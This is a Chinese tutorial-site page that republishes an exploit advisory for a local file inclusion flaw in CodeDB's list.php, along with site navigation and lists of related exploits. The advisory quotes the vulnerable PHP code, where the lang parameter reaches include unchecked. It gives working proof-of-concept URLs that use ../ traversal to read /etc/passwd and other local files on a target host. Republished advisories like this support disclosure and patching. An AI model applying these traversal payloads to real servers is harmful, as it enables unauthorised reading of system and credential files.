CodeDB (list.php lang) Local File Inclusion Vulnerability_Exploit教程-查字典教程网

导航

手机

客服中心

投稿赚钱

免费注册

首页

系统安装
WindowsXP 安装基础教程 Ubuntu 安装基础教程 Gparted 分区编辑器操作基础 VMware 虚拟机基础入门教程 VirtualBox 虚拟机基础教程 360安全卫士基础入门教程操作系统 windows10安装教程 windows8安装教程 windows7安装教程 U盘教程 windows2003教程 Linux教程苹果MAC教程其他教程
办公制作
Word 基础入门教程 Excel 基础入门教程 PowerPoint 基础入门教程蒙泰瑶光课件制作基础 OpenOffice.org Writer OpenOffice.org Calc OpenOffice.org Impress 高效办公
图像动画
Photoshop CS 基础入门教程 GIMP 基础入门教程 3DS Max 8.0 基础入门教程 Flash 8.0 基础入门教程 Flash 8.0 脚本基础教程 Ulead Gif Animator 教程图形图像 Painter基础教程 isee基础教程可牛影像基础教程光影魔术手基础教程 Freehand基础教程
音频视频
Goldwave 基础入门教程视频编辑基础入门教程影视制作媒体工具快手抖音
编程开发基础
Visual C++基础入门教程 C++ 基础入门教程 C 基础入门教程 CSS 基础入门教程 VB 基础入门教程 QBasic基础入门教程 HTML 音画帖基础入门教程 Nvu 网站制作基础 FrontPage 网站制作基础 Kompozer 网站制作基础 Kompozer 帮助文档 KompoZer user guide Poedit 翻译基础教程 Ubuntu 命令行基础教程谷歌网站管理员工具操作基础 C#基础教程
网络应用
QQ 聊天基础入门教程 Firefox3 基础入门教程 Discuz! 和 PW 论坛安装教程电子邮件基础入门教程论坛新手基础入门教程其他教程... 网络知识网络基础知识网络应用技术网络故障处理下载工具
电脑基础
iphone教程安卓教程手机软件教程手机技巧微信教程手机知识刷机教程
教学设计
2008-2009学年 2009-2010学年 2010-2011学年 2011-2012学年 2012-2013学年 2013-2014学年 2014-2015学年

当前位置：查字典教程网 >网络安全 >Exploit >CodeDB (list.php lang) Local File Inclusion Vulnerability

CodeDB (list.php lang) Local File Inclusion Vulnerability

摘要：######################################################################...

###############################################################################

#

# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability

# Author : cOndemned

# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*

#

###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension

8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.

【CodeDB (list.php lang) Local File Inclusion Vulnerability】相关文章：

★ Dreampics Builder (page) Remote SQL Injection Vulnerability

★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

★ Joomla Component EZ Store Remote Blind SQL Injection Exploit

★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

★ Mole Group Real Estate Script

★ Maian Events 2.0 Insecure Cookie Handling Vulnerability

上一篇： Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

下一篇： MFORUM 0.1a Arbitrary Add-Admin Vulnerability

相关阅读

更多>>

网友关注

更多>>

网友最新关注视频

更多>>

精品推荐

系统安装

办公制作

图像动画

音频视频

编程开发基础

网络应用

数码

摄影

平面设计

ps

网页设计

室内设计

三维

电脑

电子商务

建站

编程开发

脚本专栏

操作系统

实用技巧

软件教程

网络

硬件教程

分类导航

系统安装

办公制作

图像动画

音频视频

编程开发基础

网络应用

电脑基础

数码

摄影

平面设计

ps

网页设计

室内设计

三维

电脑

电子商务

建站

编程开发

脚本专栏

操作系统

实用技巧

软件教程

网络

硬件教程

视频教程

教学设计

网络安全子分类

最新Exploit学习

热门Exploit学习